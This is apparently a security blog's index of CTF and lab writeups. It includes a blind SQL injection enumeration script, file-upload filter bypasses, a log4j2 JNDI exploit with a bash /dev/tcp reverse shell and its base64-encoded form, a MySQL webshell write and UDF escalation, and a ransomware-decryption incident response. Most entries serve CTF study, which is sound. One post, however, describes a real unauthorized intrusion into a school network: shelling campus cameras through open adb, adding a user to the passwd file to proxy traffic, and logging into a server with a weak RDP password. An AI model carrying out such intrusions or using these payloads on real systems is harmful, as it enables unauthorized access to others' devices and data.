ctfshowWP

All ctfshow solutions will be collected here from now on.

ctfshow web8: SQL injection, but a lot is filtered, including the common and, union and spaces. It can still be probed with

    GET /index.php?id=2/**/or/**/true#
    GET /index.php?id=2/**/or/**/false#

to tell true from false, so blind injection is needed. The function used is ascii(); the idea is a comparison:

    or/**/ascii(substr(database()from/**/1/**/for/**/1))=ascii(substr(database()from/**/1/**/for/**/1))%23

This takes the first character of the current database name and compares it with itself; many articles come back, which proves the condition is true, so it works. Code to enumerate the current database name:

    import requests

    def check_id(id_value, position):
        # position increases by one for each character
        url = f"https://df8032cd-0662-449d-bb7d-7ccd15eb9c62.challenge.ctf.show/index.php?id=-1/**/or/**/ascii(substr(database()from/**/{position}/**/for/**/1))={id_value}#"
        response = requests.get(url, verify=False)
        # a response longer than 403 bytes means the condition was true
        if len(response.content) > 403:
            ascii_value = chr(id_value)
            return ascii_value
        return None

    def main():
        inp = ""
        position = 1  # character position being queried
        while position <= 5:
            for i in range(0, 128):  # iterate over ASCII values
                result = check_id(i, position)
                if result is not None:
                    inp += result
                    print(f"Position: {position}, ASCII: {result}")
                    position += 1
                    break
        print(f"Final input: {inp}")

    if __name__ == "__main__":
        main()

The database name turned out to be web8 ...

September 16, 2024 · 2 min · 316 words · neko

PHP file upload range: upload_labs [unfinished]

Since I got burned by this in a competition, I decided to go through this range again. While I was still wondering how to bypass the check, my teammate had already got a webshell; that gap is simply unacceptable.

pass-01: simple front-end JS validation, about the same as nothing. Passed.

pass-02: the key point in the source is

    if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif'))

The $_FILES superglobal holds the information about uploaded files, including the file details the client sent via POST; its type field is used to decide the file type, and in the traffic it shows up as the Content-Type: header. Changing the content-type to image/jpeg and sending the upload succeeds.

pass-03: the code for pass03 sets up a blacklist and checks against it

    $file_ext = strrchr($file_name, '.');
    $deny_ext = array('.asp','.aspx','.php','.jsp');
    if(!in_array($file_ext, $deny_ext))

It filters the common script extensions and looks airtight, but this range runs on an Apache backend, and its configuration file httpd.conf contains the line AddType application/x-httpd-php .php .php3 .phtml, which tells the server which extensions are handed to the PHP interpreter. Besides php there are also php3 and phtml, which are not in the code's filter.

pass-04: this time the filtering is strict

    $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");

But httpd.conf also contains this configuration: AllowOverride All allows a .htaccess file to override the server's global configuration, which means this file can be uploaded to override the server configuration so that a custom extension is parsed as PHP by the server

    <IfModule mime_module>
    AddType application/x-httpd-php .boom
    </IfModule>

Limitation: only exists on Apache, and AllowOverride All is off by default.

pass-05: the code is

    $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

Notice anything? hta is filtered, but php is not filtered case-insensitively.

pass-06: the code for the sixth level is missing the line that strips whitespace

    $file_ext = trim($file_ext); // strip leading and trailing whitespace

and the filter does not handle it either, so "php " (with a trailing space) can be constructed to pass.

pass-07: this time the hint says outright that all extensions are filtered

    $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

This target runs on Windows, which has a quirk: a dot added after the extension is dropped by the system. Adding a dot after the extension uses this quirk to bypass the check.

pass-08: compared with the earlier code, pass8 lacks the filter for ::$DATA, which relies on a feature of the NTFS file system, Alternate Data Streams (ADS) ...

September 14, 2024 · 2 min · 300 words · neko

Breaking out of the campus network

Breaking out of the campus network: put simply, this is internal network penetration. Besides getting out to the internet through the school network, it's also about seeing whether more devices can be taken over.

Getting internet egress: the school's setup lets the teaching area reach the internet through the campus network, while the dormitories have the campus network option but cannot get out. From last semester's experience the dormitory network and the campus network are connected, so the simplest approach is to find a device in the teaching area to use as a jump host out. That's not hard: last year the school installed quite a few cameras with the adb port open, which I have already reported several times. Since you won't fix it, I'll use it. So I picked a lucky device and connected. It's a standard shell, and an nmap scan shows the SSH port open, which makes things easy: edit the passwd file to add a user by hand, then set the password with the passwd command. That gives SSH access, which can be used as a proxy. The speed is acceptable but very unstable.

Through an RDP weak password I got into a server and found something interesting under user. At first I thought it had already been taken over by someone else, but it didn't look like it. [image text: a supply-chain system at http://***.***.***.***/xxx/Default.aspx, administrator account admin, password masked] ...

September 7, 2024 · 4 min · 654 words · neko

log4j2 reproduction

log4j tool usage, simple reproduction. log4j2 is a common open-source logging library for Java applications. JNDI is a Java interface that can fetch and load objects from a specified external server. Simple usage: pull a target

    docker pull vulfocus/log4j2-rce-2021-12-09
    docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

Tool: https://github.com/welk1n/JNDI-Injection-Exploit. After building with mvn clean package -DskipTests the jar file can be found under target. The usual reverse shell command is bash -i >& /dev/tcp/172.17.0.1/2345 0>&1; normally bash -c "bash -i >& /dev/tcp/172.17.0.1/2345 0>&1" is used to get a shell, but that does not work here, and https://ares-x.com/tools/runtime-exec is needed to encode the reverse shell, giving

    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzIzNDUgMD4mMQ==}|{base64,-d}|{bash,-i}

The tool is used as

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

-C is followed by the command to execute and -A by the attacking machine's IP address. After running it, the JDK7 and JDK8 payloads do not work on the vulfocus target; the middle one, the payload with the condition "whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath", has to be used.

July 22, 2024 · 1 min · 58 words · neko

[Xuanji] vulntarget-n Linux Tomcat ransomware incident response

vulntarget-n: analyze how the attack happened and give an attacker profile; decrypt the ransomware; restore the original index.jsp page and normal web service; find the 3 flags hidden inside.

Intrusion event: first back up the command history

    cat .bash_history >> bash_hi.bak

The first flag: flag{vulntarget_very_G00d}. But that's not enough; keep going through the logs. Following the log you can see the Tomcat server lives in /opt/tomcat/root; after backing up index a new one was created. Continuing: a .vulntarget folder was created in the root directory, a key pair was generated with python, the public key was copied to the root directory and a py script was used to encrypt. Following it to where the key was generated, the private key was not deleted, and according to the log file only RSA was used, so only a decryption script is needed. Here I hit the first point that got me stuck: the flag decrypts fine, but the relatively long index and 404 files could not be decrypted properly. This was solved later with python:

    import base64
    import os
    import rsa

    # target file extensions
    TARGET_EXTENSIONS = ['.vulntarget']

    def load_private_key(key_path):
        """Load the RSA private key"""
        with open(key_path, mode="rb") as file:
            priv_key = file.read()
        return rsa.PrivateKey.load_pkcs1(priv_key)

    def rsa_decrypt(file_name, priv_key):
        """RSA-decrypt a file"""
        with open(file_name, mode="rb") as file:
            encoded_data = file.read()
        try:
            data = base64.b64decode(encoded_data)
        except Exception as e:
            print(f"Base64 decode error for file {file_name}: {e}")
            return
        # print information about the data before decryption
        print(f"Decrypting file: {file_name}")
        print(f"Encoded data length: {len(encoded_data)}")
        print(f"Decoded data length: {len(data)}")
        # decrypted chunks
        res = []
        # decrypt 128 bytes at a time
        chunk_size = 128  # the 128-byte chunk size is the key point; flag{https://github.com/crow821/vulntarget}
        for i in range(0, len(data), chunk_size):
            chunk = data[i:i + chunk_size]
            print(f"Decrypting chunk {i // chunk_size}: {chunk.hex()[:60]}...")
            try:
                decrypted_chunk = rsa.decrypt(chunk, priv_key)
                res.append(decrypted_chunk)
            except rsa.pkcs1.DecryptionError as e:
                # on a decryption error, print the error and skip this chunk
                print(f"Decryption failed for chunk {i // chunk_size}: {e}")
                continue  # skip the failed chunk
        decrypted_data = b''.join(res)
        os.remove(file_name)
        # strip the extension
        new_file_name = file_name.replace(".vulntarget", "")
        with open(new_file_name, mode="wb") as file:
            file.write(decrypted_data)
        print(f"[+] Decrypt success: {new_file_name}")

    def decrypt_files_in_directory(directory_path, priv_key):
        """Recursively decrypt all files under a directory"""
        for root, _, files in os.walk(directory_path):
            for file in files:
                file_path = os.path.join(root, file)
                if any(file_path.endswith(ext) for ext in TARGET_EXTENSIONS):
                    rsa_decrypt(file_path, priv_key)

    def main(target_path, key_path):
        """Entry point"""
        priv_key = load_private_key(key_path)
        if os.path.isdir(target_path):
            decrypt_files_in_directory(target_path, priv_key)
        else:
            if any(target_path.endswith(ext) for ext in TARGET_EXTENSIONS):
                rsa_decrypt(target_path, priv_key)

    if __name__ == '__main__':
        target_path = './'  # replace with the actual path
        key_path = './key.pem'  # replace with the private key path
        main(target_path, key_path)

Chunked decryption was used ...

July 13, 2024 · 2 min · 242 words · neko

MySQL UDF privilege escalation explained

MySQL UDF privilege escalation. Last time I ran into UDF privilege escalation in a challenge and couldn't solve it, so I'm catching up. This assumes basic access has already been obtained and privilege escalation to mysql is needed.

Obtaining access: just a quick list; this time the focus is the UDF privilege escalation technique.
1. sqlmap --os-shell
2. manual dumpfile
3. NDAY

Webshell: requires knowing the web root, having mysql root privileges, and secure_file_priv being empty (unrestricted). secure_file_priv can be queried with show global variables like '%secure_file_priv%'; NULL means writing is not allowed.

    Variable_name     Value
    secure_file_priv

    SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/www/wwwroot/192.168.56.102_8083/phpinfo.php';

Manual UDF: a UDF (User Defined Function) is, as the name says, a user-defined function, usually a dynamic library written in C: a dll on Windows, an so on Linux. So, loosely speaking, UDF is a form of C code execution ...

July 8, 2024 · 1 min · 151 words · neko

[Xuanji] Log analysis: MySQL incident response

This tests familiarity with penetration methods against MySQL.
1. The first shell the attacker wrote: flag{key string}
2. The IP the attacker's reverse shell connected to: flag{ip}
3. The md5 of the full path of the attacker's privilege-escalation file: flag{md5}, note the format /xxx/xxx/xxx/xxx/xxx.xx
4. The privileges the attacker obtained: flag{value of whoami}

The reverse-shell IP: the only MySQL penetration methods I can think of are injection and weak-password takeover. First find the logs

    root@xuanji:~# find / -name mysql
    /etc/init.d/mysql
    /etc/mysql
    /usr/bin/mysql
    /usr/lib/perl5/auto/DBD/mysql
    /usr/lib/perl5/DBD/mysql
    /usr/lib/mysql
    /usr/share/mysql
    /usr/share/php5/mysql
    /var/lib/mysql
    /var/lib/mysql/mysql
    /var/lib/php5/modules/apache2/enabled_by_maint/mysql
    /var/lib/php5/modules/cli/enabled_by_maint/mysql
    /var/lib/php5/modules/registry/mysql
    /var/log/mysql

After cat, the content worth noting is

    sh: 1: curl: not found
    --2023-08-01 02:14:11-- http://192.168.100.13:771/
    Connecting to 192.168.100.13:771... connected.
    HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
    Length: unspecified
    Saving to: 'index.html'

    0K 2.46 =2.0s

    2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5]

    /tmp/1.sh: line 1: --2023-08-01: command not found
    /tmp/1.sh: line 2: Connecting: command not found
    /tmp/1.sh: line 3: HTTP: command not found
    /tmp/1.sh: line 4: Length:: command not found
    /tmp/1.sh: line 5: Saving: command not found
    /tmp/1.sh: line 7: 0K: command not found
    /tmp/1.sh: line 9: syntax error near unexpected token `('
    /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]'

The server downloaded a script from 192.168.100.13 and ran it; cat the script ...

July 4, 2024 · 1 min · 195 words · neko

R3PHP wp

R3PHP: I would never have figured this out without the writeup. The original challenge:

    <?php
    error_reporting(0);
    if(strpos($_REQUEST['url'],"http")===0){
        $opts = array(
            'http'=>array(
                'method'=>"GET",
                'header'=>$_REQUEST['header'])
        );
        $context = stream_context_create($opts);
        $file = file_get_contents($_REQUEST['url'], false, $context);
        // echo $file; # no show for u
    }else{
        echo "hacker!";
    }
    highlight_file(__FILE__);
    ?>

This seems to be what the challenge author said: First, by reading the code, you can know that it is a blind SSRF, and then you can also pass the header. After casually entering a url, I found that 404 is phpstudy, and I can tell that it is a small skin panel of linux. The code of phpstudy Panel, audit found that all requests go through port 8090: ...

June 11, 2024 · 3 min · 602 words · neko

NSSCTF [SWPUCTF 2022 Freshman Competition] funny_web

The login is pretty confusing: the account is NSS, and I only learned the password from other people's writeups. It's easy to see that the key code is

    if ($num != '12345') {
        if (intval($num) == '12345') {
            echo $FLAG;
        }
    }

The check uses the intval function, commonly seen in forced type conversion; it drops the fractional part when converting, and its second parameter can be omitted, meaning the function does the conversion automatically. The mapping is: a leading 0 means octal, a leading 0x means hexadecimal, otherwise decimal. Passing 12345.123 does it.

June 6, 2024 · 1 min · 22 words · neko

Learning SQL injection [to be continued]

SQL injection: a classic among classics and the most basic of basics, something everyone runs into when starting out, so it deserves a proper close look. SQL injection is essentially SQL code that concatenates user content without filtering it, like this code

    $id = $_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

where the SQL statement can be controlled directly through the GET parameter.

Simple classification: integer injection, string injection, error-based injection, boolean blind injection, time-based blind injection, stacked injection.

Injection methods and writing a shell. order judgment and union query: I wrote a simple PHP script and a table

    CREATE TABLE users (
        id INT AUTO_INCREMENT PRIMARY KEY,
        username VARCHAR(255) NOT NULL,
        email VARCHAR(255) NOT NULL UNIQUE
    );

    <?php
    if(isset($_GET['id'])){
        $host = 'localhost';
        $dbname = 'testsql';
        $user = 'root';
        $pass = 'b409797a01eaf960';
        $conn = mysqli_connect($host, $user, $pass, $dbname);
        mysqli_select_db($conn, $dbname);
        $id = $_GET['id'];
        $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
        $result = mysqli_query($conn, $sql);
        $row = mysqli_fetch_array($result);
        echo $row['id'];
        echo $row['email'];
        echo $row['username'];
    }
    ?>

order by + union select is in my view the simplest injection method, and nowadays it feels relatively rare. union literally means joining; in SQL it glues two query statements together, for example ...

June 1, 2024 · 4 min · 767 words · neko